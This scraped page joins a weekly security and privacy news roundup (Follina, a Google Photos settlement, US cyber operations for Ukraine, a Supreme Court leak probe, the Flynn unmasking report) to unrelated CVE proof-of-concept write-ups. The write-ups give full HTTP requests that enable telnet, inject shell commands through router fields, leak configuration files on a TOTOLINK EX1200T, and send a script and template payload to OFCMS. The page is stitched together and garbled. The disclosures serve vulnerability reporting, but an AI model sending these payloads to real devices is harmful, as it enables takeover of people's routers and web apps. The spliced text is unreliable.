Plus: The US admits to cyber operations supporting Ukraine, SCOTUS investigates its own, and a Michael Flynn surveillance mystery is solved.

Not to freak out anyone, but there's a serious flaw in all supported versions of Microsoft Windows that allows attackers to take over your machine. The so-called Follina vulnerability can be exploited using a weaponized Word document, and security researchers say they've already spotted government-backed hackers using this attack in the wild. Fingers crossed that Microsoft, which has downplayed the severity of the flaw, issues a patch soon.

Speaking of patches, everything from Apple's iOS and Google Android to Chrome, Firefox, and Zoom received major security updates in May. Check out our complete list of available updates to see which apps you need to attend to as soon as possible.

We also explored the race to protect your voice from hackers and corporate greed. And we tried to unravel the mystery of China's sudden warnings about US state-sponsored hackers going after Chinese systems, despite the fact that these hacks are well known and happened ages ago.

Meanwhile, in India, the country's telecom regulator is preparing to crack down on robocall spam and scammers by requiring callers' names to appear on caller ID. The idea sounds good—until you realize the privacy implications and the fact that such a plan might not even work.

Finally, because nothing's sacred, Canada's privacy commissioner this week announced that a mobile app for Tim Hortons, the beloved coffee chain, illegally spied on its users' locations. The app, which used location-tracking tech from US-based firm Radar, collected a constant stream of users' location data—checking as frequently as every 2.5 minutes—and would create an “event” anytime a user “entered or left” their home, office, major sports complex, or rival coffee shop, according to the commissioner's office.

But that's not all, folks. Each week, we round up the big security and privacy news we didn't cover ourselves. Click the links for the full stories, and stay safe out there. 

If you lived in Illinois between May 1, 2015, and April 25, 2022, Google may owe you some cash. The company recently settled a class-action lawsuit over a feature in the Google Photos app that categorized photos of people based on their faces. The problem? According to the lawsuit, Google failed to receive consent to do so from millions of users, a violation of the state's Biometric Information Privacy Act. Google did not admit fault as part of the settlement, but it has agreed to pay $100 million and put in place measures to avoid further privacy violations. If you were an Illinois resident during that seven-year period and appeared in a photo uploaded to the Google Photos app, you can file a claim for your piece of the $100 million pie.

The blurry line between “at war” and “not at war” grew even fuzzier this week. General Paul Nakasone, the head of US Cyber Command and the NSA, told Sky News that the US military has conducted “a series of operations across the full spectrum," including “offensive, defensive, and information operations” in support of Ukraine's defense against Russia's invasion. Nakasone declined to detail what these operations entailed but assured that they were perfectly legal. The general's admission coincides with the US agreeing to provide Ukraine with advanced missile systems with a range of 50 miles. The Kremlin responded to this news by saying the US was “pouring fuel on the fire.”

As part of the US Supreme Court's investigation into the leak of a draft opinion overturning guaranteed abortion rights in the United States, the Court's clerks have been asked to turn over their private phone records and sign an affidavit, according to CNN. The “unprecedented” move is jarring for civil liberties advocates. As Albert Fox Cahn, found of the Surveillance Technology Oversight Project, writes for WIRED: “The intrusive probe reveals a disturbing about-face from the Supreme Court, and particularly Chief Justice John Roberts, on surveillance powers.” The clerks, meanwhile, are reportedly hesitant to refuse the demand for phone records or seek legal counsel for fear of being wrongly suspected of leaking the draft opinion to _Politico_ reporters.

A Trump-era conspiracy theory can finally be put to rest—theoretically, at least. A 52-page classified report into the “unmasking” of Michael Flynn, a former US national security adviser to Donald Trump, has now been made public thanks to a Freedom of Information Act request filed by Jason Leopold of Buzzfeed News. Republicans have long accused Obama administration operatives of revealing Flynn's name in classified material for political purposes in the lead-up to the 2016 election. But the Justice Department report, prepared by former US Attorney John Brash, found “no evidence that unmasking requests were made for political purposes or other inappropriate reasons during the 2016 election period or the ensuing transition period." Flynn ultimately resigned in 2017 for misleading vice president Mike Pence about Flynn’s calls with Russia's ambassador to the US.

Google May Owe You a Chunk of $100 Million

In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can start telnet without authorization because the default username and password exists in the firmware.

The attacker can start telnet without authorization, the default username and password exists in the firmware.

Telnet is enabled by sending the following POST packet .

    POST /cgi-bin/cstecgi.cgi?action=1 HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"setTelnetCfg","telnet_enabled":"1"}

CVE-2021-42892: vuln/totolink_ex1200t_telnet_default.md at main · p1Kk/vuln

TOTOLINK EX1200T V4.1.2cu.5215 contains a remote command injection vulnerability in function NTPSyncWithHost of the file system.so which can control hostTime to attack.

There is a remote command injection in the function NTPSyncWithHost of the file system.so , we can control thehostTime to attack.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"NTPSyncWithHost",
    "hostTime":"\"\nps>/web_cste/test1\n\""}

CVE-2021-42890: vuln/totolink_ex1200t_hosttime_rce.md at main · p1Kk/vuln

TOTOLINK EX1200T V4.1.2cu.5215 contains a remote command injection vulnerability in function setLanguageCfg of the file global.so which can control langType to attack.

There is a remote command injection in the function setLanguageCfg of the file global.so , we can control thelangType to attack.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"setting/setLanguageCfg",
    "langFlag":"1",
    "langType":"\nps>/web_cste/test1\necho"}

CVE-2021-42888: vuln/totolink_ex1200t_langtype_rce.md at main · p1Kk/vuln

TOTOLINK EX1200T V4.1.2cu.5215 contains an information disclosure vulnerability where an attacker can get the apmib configuration file without authorization, and usernames and passwords can be found in the decoded file.

Permalink

Cannot retrieve contributors at this time

**TOTOLINK EX1200T LEAK****Vulnerability Description**

PRODUCT: TOTOLINK EX1200T V4.1.2cu.5215 (latest version)

The attacker can get the **apmib** configuration file Config-EX1200T-xxxxxxxx.dat without authorization, username and password can be found in the decoded file.

**PoC**

    GET /cgi-bin/ExportSettings.sh HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 0
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.0.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    Connection: close

CVE-2021-42886: vuln/totolink_ex1200t_exportsettings_leak.md at main · p1Kk/vuln

TOTOLINK EX1200T V4.1.2cu.5215 contains a remote command injection vulnerability in function setDeviceMac of the file global.so which can control deviceName to attack.

There is a remote command injection in the function setDeviceMac of the file global.so , we can control thedeviceName to attack.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"setting/setDeviceName",
    "deviceMac":"1'\nps>/web_cste/test1\n'",
    "deviceName":"1"}

CVE-2021-42885: vuln/totolink_ex1200t_devicemac_rce.md at main · p1Kk/vuln

TOTOLINK EX1200T V4.1.2cu.5215 contains a remote command injection vulnerability in function setDeviceName of the file global.so which can control thedeviceName to attack.

There is a remote command injection in the function setDeviceName of the file global.so , we can control thedeviceName to attack.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"setting/setDeviceName",
    "deviceMac":"1",
    "deviceName":"1'\nps>/web_cste/test1\n'"}

CVE-2021-42884: vuln/totolink_ex1200t_devicename_rce.md at main · p1Kk/vuln

OFCMS v1.1.4 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/comn/service/update.json.

\[Suggested description\]  
There are many cross-site scripting vulnerabilities in the background of OFCMS system version 1.1.4, because the special characters entered are not effectively escaped.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

    POST /ofcms/admin/comn/service/update.json?sqlid=system.role.update HTTP/1.1
    Host: localhost:7000
    Content-Length: 94
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://localhost:7000
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:7000/ofcms/admin/f.html?p=system/role/edit.html&role_id=3&_fsUuid=820e45c9-7f52-4e8d-b917-930c4b13153c
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=A81B589572EF210191B7C30F017A814D
    Connection: close
    
    role_id=3&role_name=%24%7B2*2%7D&role_desc=Test+freemarker+%3Cscript%3Ealert(1)%3C%2Fscript%3E
    

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability to prove\]  
Case 1:  
/ofcms/admin/comn/service/update.json?sqlid=system.menu.update  
  
  

Case 2:  
/ofcms/admin/comn/service/update.json?sqlid=cms.bbs.update  
  
  

Case 3:  
/ofcms/admin/comn/service/update.json?sqlid=cms.ad.update

CVE-2022-29653: There are many cross-site scripting vulnerabilities in ofCMS system background · Issue #I53COA · 欧福/ofcms - Gitee.com

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

Tag

#apple